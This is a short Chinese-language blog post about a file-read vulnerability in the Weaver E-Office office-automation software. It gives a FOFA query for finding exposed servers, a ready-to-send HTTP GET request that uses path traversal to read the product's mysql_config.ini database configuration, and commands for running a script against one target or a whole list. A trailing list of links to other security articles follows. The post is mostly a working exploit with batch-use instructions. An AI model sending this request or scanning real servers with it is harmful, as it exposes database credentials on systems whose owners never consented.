泛微E-Office前台文件读取漏洞

一、漏洞描述

泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。

泛微E-Office前台文件读取漏洞。

二、网络空间搜索引擎查询

fofa查询

复制代码
 app="泛微-EOffice"

三、漏洞复现

poc

复制代码
GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

浏览器直接访问返回如下

四、批量检测与利用

单个检测与利用

复制代码
 python .\E-OfficeReadfile.py -u http://ip:port

批量检测

复制代码
 python .\E-OfficeReadfile.py -f filename

关注微信公众号 网络安全透视镜 回复 20231008-1 获取批量检测脚本

相关推荐
treesforest1 小时前
随意装软件也会被恶意IP入侵电脑?
网络·网络协议·tcp/ip·网络安全·ip属地·查ip归属地
Yan_chen66615 小时前
SQL-LABS_Less18-20实战攻略
数据库·sql·web安全·网络安全
Lust Dusk17 小时前
记一次Linux应急响应题目解析
linux·运维·服务器·网络·安全·网络安全
笨鸟先飞,勤能补拙18 小时前
AI 安全的下一个 5 年:从 Agent 到 AGI 的攻防博弈
人工智能·python·安全·web安全·网络安全·github·agi
数据知道19 小时前
SQL 注入从入门到精通:手工注入 + sqlmap 自动化
网络·数据库·sql·网络安全·自动化
雾屿_Mistisle20 小时前
文件上传漏洞
web安全
数据知道20 小时前
OWASP Top 10 实战通关指南:总览篇
网络·安全·网络安全
Lust Dusk1 天前
记一次web渗透做题思路解析
网络·安全·web安全·网络安全
Sagittarius_A*1 天前
Burst Lab|PHP 审计 10:PHP 网络请求与 SSRF 漏洞审计思路
网络·安全·web安全·php·代码审计
Yan_chen6661 天前
HTTP和HTTPS 完整指南
网络协议·web安全·http·网络安全·https